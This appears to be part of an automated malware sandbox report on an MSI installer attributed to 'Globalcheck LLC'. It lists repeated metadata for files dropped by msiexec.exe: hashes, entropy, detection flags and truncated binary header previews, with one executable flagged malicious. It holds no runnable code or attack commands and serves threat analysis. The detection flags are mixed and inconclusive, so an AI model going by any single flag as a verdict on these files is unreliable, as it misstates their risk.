                                                                                                                                                                              Preview:......................>..................."...................................E.......a...............................(...)...*...+...,...-...........A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...........................................................................................................................................................................................................................................................................................................................;...........!...3............................................................................................... ...+..."...#...$...%...&...'...(...)...*...1...,...-......./...0...4...2...:...?...5...6...7...8...9...>...<.......=...........@...A...B...C...D...........G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):446944
                                                                                                                                                                              Entropy (8bit):6.403916470886214
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                              MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                              SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                              SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                              SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                              • Filename: zdi.txt.msi, Detection: malicious, Browse
                                                                                                                                                                              • Filename: merd.msi, Detection: malicious, Browse
                                                                                                                                                                              • Filename: medk.msi, Detection: malicious, Browse
                                                                                                                                                                              • Filename: lavi.msi, Detection: malicious, Browse
                                                                                                                                                                              • Filename: Document-v09-42-38.js, Detection: malicious, Browse
                                                                                                                                                                              • Filename: Document-v05-53-20.js, Detection: malicious, Browse
                                                                                                                                                                              • Filename: FW3x3p4eZ5.msi, Detection: malicious, Browse
                                                                                                                                                                              • Filename: Document-19-06-38.js, Detection: malicious, Browse
                                                                                                                                                                              • Filename: Document-19-06-38.js, Detection: malicious, Browse
                                                                                                                                                                              • Filename: Document-14-33-26.js, Detection: malicious, Browse
                                                                                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):446944
                                                                                                                                                                              Entropy (8bit):6.403916470886214
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                              MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                              SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                              SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                              SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):446944
                                                                                                                                                                              Entropy (8bit):6.403916470886214
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                              MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                              SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                              SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                              SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):446944
                                                                                                                                                                              Entropy (8bit):6.403916470886214
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                              MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                              SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                              SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                              SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):401013
                                                                                                                                                                              Entropy (8bit):6.5919221010343225
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6144:GMvZx0Flyv/UB8zBQSnuJnO6n4ZSaHwLvFnNLqrFWeyp1uBxfAOT3VDqO1x:GMvZx0FlS68zBQSncb4ZPQTpAjZxqO1x
                                                                                                                                                                              MD5:F690E7D5BD372BB9D748516D57EDC7CB
                                                                                                                                                                              SHA1:1466C372DE7B344AFEB2DB206CE83EC6F60A6FAE
                                                                                                                                                                              SHA-256:C25CA9C27CA80046ACBB6C1818E1E19616C136B4CCA33C410AB43A2453E324A6
                                                                                                                                                                              SHA-512:FC642E215826F23241ADE04D600424CFF0C7E932C152B810177BCF553D50EE9A9F38FA3F026CF1D2AF24417613D24E243F98D92A77D19872FC1C0E1F639B31A9
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:...@IXOS.@.....@a].Y.@.....@.....@.....@.....@.....@......&.{C0BBEF1E-56B5-4B7D-BEF8-15F4EFC0E044}..Globalcheck..fes.msi.@.....@#....@.....@........&.{C49E1A71-9FF1-45F1-BD5D-A50F7F71232E}.....@.....@.....@.....@.......@.....@.....@.......@......Globalcheck......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{B48CC27C-9823-4256-8235-834BFD2D0DBB};.C:\Users\user\AppData\Roaming\Globalcheck LLC\Globalcheck\.@.......@.....@.....@......&.{4A323D5F-6D73-4C26-8E39-BE8928DA13EB}0.01:\Software\Globalcheck LLC\Globalcheck\Version.@.......@.....@.....@......&.{602B36A8-BB6A-4A36-906F-F62140AE53DB}).C:\Users\user\AppData\Roaming\avutil.dll.@.......@.....@.....@........CreateFolders..Creating folders..Folder: [1]".;.C:\Users\user\AppData\Roaming\Globalcheck LLC\Globalcheck\.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]...@L....@....
                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):399328
                                                                                                                                                                              Entropy (8bit):6.589290025452677
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6144:gMvZx0Flyv/UB8zBQSnuJnO6n4ZSaHwLvFnNLqrFWeyp1uBxfAOT3VDqO1:gMvZx0FlS68zBQSncb4ZPQTpAjZxqO1
                                                                                                                                                                              MD5:B9545ED17695A32FACE8C3408A6A3553
                                                                                                                                                                              SHA1:F6C31C9CD832AE2AEBCD88E7B2FA6803AE93FC83
                                                                                                                                                                              SHA-256:1E0E63B446EECF6C9781C7D1CAE1F46A3BB31654A70612F71F31538FB4F4729A
                                                                                                                                                                              SHA-512:F6D6DC40DCBA5FF091452D7CC257427DCB7CE2A21816B4FEC2EE249E63246B64667F5C4095220623533243103876433EF8C12C9B612C0E95FDFFFE41D1504E04
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................J......J..5.......................J......J......J..........Y..."......".q............."......Rich....................PE..L....<.a.........."......^...........2.......p....@..........................P......".....@.................................0....................................5...V..p....................X.......W..@............p.. ............................text....\.......^.................. ..`.rdata..XA...p...B...b..............@..@.data....6..........................@....rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                              Entropy (8bit):1.1622221895499463
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12:JSbX72Fji+AGiLIlHVRpqh/7777777777777777777777777vDHFpwYjOiXDpZlN:JjQI56Q5iX2F
                                                                                                                                                                              MD5:F3C51BFDACAD24F939E2395A928F3124
                                                                                                                                                                              SHA1:0322D8F71DE33A126E497F195BA33C8C6CFBA3CD
                                                                                                                                                                              SHA-256:C29BFE3722D6293458F08C2C185B5C119F00F1AAF7B647CACB9B9E436927C4BA
                                                                                                                                                                              SHA-512:744BA337FCEB615AADBB5A6C314F64E63E8AADA49196C3B27DCFAC025B27EAA35034F95106248320F381F196AF8078639C3CFA031D69C6582B039EB482FC5AF3
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                              Entropy (8bit):1.543984216305642
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:j8PhzuRc06WXOGnT5xkBw5Wl+SCWlkAECiCyCXozWl+SCWlCT57:Khz1InTEBwEl+Wl7EChBl+Wlm7
                                                                                                                                                                              MD5:43044C9A2350F70A1BDAC4EDD9345ACC
                                                                                                                                                                              SHA1:51B7AE6E58E51AD752680818A2382683BB462CD3
                                                                                                                                                                              SHA-256:F6AC94F7F78132A0A15F9FF9B52FB7E587D3C5C1DDCC166EE3C77BFA697D8F5A
                                                                                                                                                                              SHA-512:59142A8A3D8B2D738A3E118745AADB6DFD3DA8EA62EE005B8C186A91B0CFD200A975840BC5000FEDB5BCBF2D5A1860D175B1B6AB0B85854DF2A5AE685C923482
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):432221
                                                                                                                                                                              Entropy (8bit):5.375175565011653
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26KgauK:zTtbmkExhMJCIpErv
                                                                                                                                                                              MD5:60B3F2522CF2FA11873137208CFDB2ED
                                                                                                                                                                              SHA1:503A8563997BCCFCCEAB018286E4883049BE52A1
                                                                                                                                                                              SHA-256:86FEC627345F7CC26E8CFC34EE354E84815E23D0058E01EA0D9D753B650E49B4
                                                                                                                                                                              SHA-512:A6D687958BB18B566660246369B2F327CA77C72560E8FEEC688CB48AF10B6352C715054DA963346E04A4553F4CD57747742183518EBA1D4114C70E8B9CDB252F
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):32768
                                                                                                                                                                              Entropy (8bit):0.06865931830471758
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKO0QwYIwOiXM16Vky6lZ:2F0i8n0itFzDHFpwYjOiX2Z
                                                                                                                                                                              MD5:26F74156E878F0B4F7F18D8662F0F11E
                                                                                                                                                                              SHA1:0D72CA0DDC3525933EA7A1217AEE8D9A1FB9C388
                                                                                                                                                                              SHA-256:1C07A36FC17C3CF2B2E8DF9CF0F095DCF870E6774FED5097A48F5CBD3BBFC668
                                                                                                                                                                              SHA-512:7E38AE02F84062B8C60A3B7DFE53DF3F294AF4A86BFE6508B49AC3E1150C166F0849B0562F24EFD127C68EAFD6676D985ACE71D6AB3D7E7E34516DC2E9D77270
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):32768
                                                                                                                                                                              Entropy (8bit):1.239202807521429
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:PAruANvcFXOlT5LPkBw5Wl+SCWlkAECiCyCXozWl+SCWlCT57:IrcoTWBwEl+Wl7EChBl+Wlm7
                                                                                                                                                                              MD5:AB630DB5FAEB292F3C13C3963D101B66
                                                                                                                                                                              SHA1:746FB3589BBD2E240839BAC4EED506C7127BBD80
                                                                                                                                                                              SHA-256:907BF244FFAE0A766243CB2B146E2793EFC71096B8C9CC261333769752C8115B
                                                                                                                                                                              SHA-512:997A31A379678E8971198DE8307A2C0F665D2B9BD92511780386AA749CEF448731F7C563572E4A6D75E9C006A4B4F3EE654E955664825A555C6DD4BEAD16A35B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                              Entropy (8bit):1.543984216305642
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:j8PhzuRc06WXOGnT5xkBw5Wl+SCWlkAECiCyCXozWl+SCWlCT57:Khz1InTEBwEl+Wl7EChBl+Wlm7
                                                                                                                                                                              MD5:43044C9A2350F70A1BDAC4EDD9345ACC
                                                                                                                                                                              SHA1:51B7AE6E58E51AD752680818A2382683BB462CD3
                                                                                                                                                                              SHA-256:F6AC94F7F78132A0A15F9FF9B52FB7E587D3C5C1DDCC166EE3C77BFA697D8F5A
                                                                                                                                                                              SHA-512:59142A8A3D8B2D738A3E118745AADB6DFD3DA8EA62EE005B8C186A91B0CFD200A975840BC5000FEDB5BCBF2D5A1860D175B1B6AB0B85854DF2A5AE685C923482
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):512
                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3::
                                                                                                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):512
                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3::
                                                                                                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):32768
                                                                                                                                                                              Entropy (8bit):1.239202807521429
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:PAruANvcFXOlT5LPkBw5Wl+SCWlkAECiCyCXozWl+SCWlCT57:IrcoTWBwEl+Wl7EChBl+Wlm7
                                                                                                                                                                              MD5:AB630DB5FAEB292F3C13C3963D101B66
                                                                                                                                                                              SHA1:746FB3589BBD2E240839BAC4EED506C7127BBD80
                                                                                                                                                                              SHA-256:907BF244FFAE0A766243CB2B146E2793EFC71096B8C9CC261333769752C8115B
                                                                                                                                                                              SHA-512:997A31A379678E8971198DE8307A2C0F665D2B9BD92511780386AA749CEF448731F7C563572E4A6D75E9C006A4B4F3EE654E955664825A555C6DD4BEAD16A35B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                              Entropy (8bit):1.543984216305642
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:j8PhzuRc06WXOGnT5xkBw5Wl+SCWlkAECiCyCXozWl+SCWlCT57:Khz1InTEBwEl+Wl7EChBl+Wlm7
                                                                                                                                                                              MD5:43044C9A2350F70A1BDAC4EDD9345ACC
                                                                                                                                                                              SHA1:51B7AE6E58E51AD752680818A2382683BB462CD3
                                                                                                                                                                              SHA-256:F6AC94F7F78132A0A15F9FF9B52FB7E587D3C5C1DDCC166EE3C77BFA697D8F5A
                                                                                                                                                                              SHA-512:59142A8A3D8B2D738A3E118745AADB6DFD3DA8EA62EE005B8C186A91B0CFD200A975840BC5000FEDB5BCBF2D5A1860D175B1B6AB0B85854DF2A5AE685C923482
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):512
                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3::
                                                                                                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):32768
                                                                                                                                                                              Entropy (8bit):1.239202807521429
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:PAruANvcFXOlT5LPkBw5Wl+SCWlkAECiCyCXozWl+SCWlCT57:IrcoTWBwEl+Wl7EChBl+Wlm7
                                                                                                                                                                              MD5:AB630DB5FAEB292F3C13C3963D101B66
                                                                                                                                                                              SHA1:746FB3589BBD2E240839BAC4EED506C7127BBD80
                                                                                                                                                                              SHA-256:907BF244FFAE0A766243CB2B146E2793EFC71096B8C9CC261333769752C8115B
                                                                                                                                                                              SHA-512:997A31A379678E8971198DE8307A2C0F665D2B9BD92511780386AA749CEF448731F7C563572E4A6D75E9C006A4B4F3EE654E955664825A555C6DD4BEAD16A35B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):512
                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3::
                                                                                                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):73728
                                                                                                                                                                              Entropy (8bit):0.13003185354218783
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:F3uTeWl+SCWl3Wl+SCWlkAECiCyCXosw8k:F3Ql+Wlml+Wl7EChJw1
                                                                                                                                                                              MD5:266F665D0625A8796316A14F899790A8
                                                                                                                                                                              SHA1:448F7337D70F5093CFC8E2F006C5707201B7415F
                                                                                                                                                                              SHA-256:537ABDB45C5B98C4204321D0513E25DA7B646FFBF568EA2D3AE3C21BBB79103A
                                                                                                                                                                              SHA-512:C6E291BE1909882114991A1F3DC89E500A412F5FB961C950F650F825774B3CD7D58083F69E94F4EBAFC7A3728B68BD6A1C8293B79895979DCF22A1BC028D088C
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):512
                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3::
                                                                                                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {C49E1A71-9FF1-45F1-BD5D-A50F7F71232E}, Number of Words: 10, Subject: Globalcheck, Author: Globalcheck LLC, Name of Creating Application: Globalcheck, Template: ;1033, Comments: Database, Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                                                                                                                                              Entropy (8bit):7.4656553416380085
                                                                                                                                                                              TrID:
